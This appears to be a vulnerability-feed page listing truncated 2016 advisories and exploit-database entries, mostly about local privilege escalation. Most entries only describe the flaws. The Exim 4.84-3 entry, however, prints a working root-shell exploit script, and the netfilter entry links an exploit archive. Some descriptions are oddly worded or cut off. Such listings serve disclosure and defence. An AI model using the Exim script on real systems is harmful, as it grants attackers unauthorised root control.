CVE-2016-4709

CVE-2016-4709 is a local privilege-escalation vulnerability in WindowServer on Apple OS X/macOS prior to 10.12. The root cause is a type-confusion issue in CoreGraphics handling that allows a local attacker to obtain root privileges. Connected advisories (ZDI-16-608/16-609) describe the same Wind...

The vulnerability of the Android operating system, which allows a hacker to increase their privileges

The vulnerability of the drivers/media/platform/msm/camerav2/sensor/csiphy/msmcsiphy.c component of Qualcomm’s Android operating system is related to deficiencies in access control. Exploiting this vulnerability could allow an attacker, operating locally, to enhance their privileges through an...

7-Zip Local Code Execution Vulnerability

7-Zip is a free, open source compression/decompression software. A local code execution vulnerability exists in 7-Zip, which can be exploited by a local attacker to execute arbitrary code in an affected application, possibly also resulting in a denial of service...

KLA10848 Multiple vulnerabilities in Oracle VM VirtualBox

An unspecified vulnerabilities were found in Oracle VM VirtualBox. By exploiting these vulnerabilities malicious users can cause denial of service or obtain sensitive vulnerabilities. These vulnerabilities can be exploited remotely or locally. Original advisories Oracle bulletin Related products...

The Debian/Ubuntu Exim local mention the right vulnerability

No description provided by source...

Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation

/ EDB Note: Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip Video https://www.youtube.com/watch?v=qchiJn94kTo / / decr.c / / Ubuntu 16.04 local root exploit - netfilter targetoffset OOB checkcompatentrysizeandhooks/checkentry Tested on...

DEBIAN-CVE-2016-1237

nfsd in the Linux kernel through 4.6.3 allows local users to bypass intended file-permission restrictions by setting a POSIX ACL, related to nfs2acl.c, nfs3acl.c, and nfs4acl.c...

Cisco Unified IP Phones本地权限提升漏洞

No description provided by source...

Android Qualcomm Video Driver Local Elevation of Privilege Vulnerability

Android is a Linux-based open source operating system developed by Google and the Open Handheld Alliance OHA, and Qualcomm Video Driver is a video driver developed by Qualcomm. An elevation of privilege vulnerability exists in the Qualcomm Video Driver for Android. A local attacker could exploit...

KLA10813 Privilege escalation vulnerability in Apple iTunes

An unspecified vulnerability was found in Apple iTunes setup. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited locally via a DLL hijack. Original advisories Apple advisory Related products Apple-iTunes CVE list CVE-2016-1742 high Solution...

KLA10814 Privilege escalation vulnerability in VMware Player and Workstation

An improper file access was found in VMware products. By exploiting this vulnerability malicious users can gain privileges. This vulnerability can be exploited locally. Original advisories VMware advisory Related products VMware-Workstation VMware-Player CVE list CVE-2016-2077 critical Solution...

Microsoft Windows Win32k Elevation of Privilege Vulnerability (CNVD-2016-03105)

Microsoft Windows is a series of operating systems released by Microsoft USA. win32k.sys is the kernel part of the Windows subsystem, a kernel-mode device driver, which contains a window manager, background control windows and screen output management. An elevation of privilege vulnerability exis...

CVE-2016-0774

CVE-2016-0774 affects Linux kernel backports in Debian wheezy (before 3.2.73-2+deb7u3) and RHEL 7.1 (before 3.10.0-229.26.2). The flaw is in the pipe_read/pipe_write paths in fs/pipe.c where the side effects of failed __copy_to_user_inatomic/__copy_from_user_inatomic calls are not properly handle...

Linux kernel SET_WPS_IE IOCTL component stack buffer overflow vulnerability

The Linux kernel is the kernel used by the operating system Linux, released by the Linux Foundation in the United States. A stack buffer overflow vulnerability exists in the SETWPSIE IOCTL component of the Linux kernel. A local attacker could exploit this vulnerability to affect confidentiality,...

SAP NetWeaver AS ABAP - Directory traversal using READ DATASET

Application: SAP NetWeaver AS ABAP Versions Affected: SAP NetWeaver AS ABAP 7.4 Vendor URL: SAP Bugs: Directory traversal Reported: 22.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 09.08.2016 Reference: SAP Security Note 2312966 Author: Daria Prosochkina ERPScan VULNERABILITY...

FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow

Exploit for freebsd platform in category dos / poc / 1. Advisory Information Title: FreeBSD Kernel amd64setldt Heap Overflow Advisory ID: CORE-2016-0005 Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-amd64setldt-heap-overflow Date published: 2016-03-16 Date of last update:...

Exim 4.84-3 - Local Privilege Escalation

!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...

Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)

Microsoft Windows - Kerberos Security Feature Bypass MS16-014 Exploit Title: Windows Kerberos Security Feature Bypass Date: 12-02-2016 Exploit Author: Nabeel Ahmed Tested on: Windows 7 Professional x32/x64 CVE : CVE-2016-0049 Category: Local Exploit 1 Prerequisites: - Standard Windows 7 Fully...

Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)

Exploit for windows platform in category local exploits Exploit Title: Windows Kerberos Security Feature Bypass Date: 12-02-2016 Exploit Author: Nabeel Ahmed Tested on: Windows 7 Professional x32/x64 CVE : CVE-2016-0049 Category: Local Exploit 1 Prerequisites: - Standard Windows 7 Fully patched a...

yTree 1.94-1.1 - Local Buffer Overflow

Exploit for linux platform in category dos / poc Description: yTree is prone to a stack-based overflow, an attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Tested and developed on:...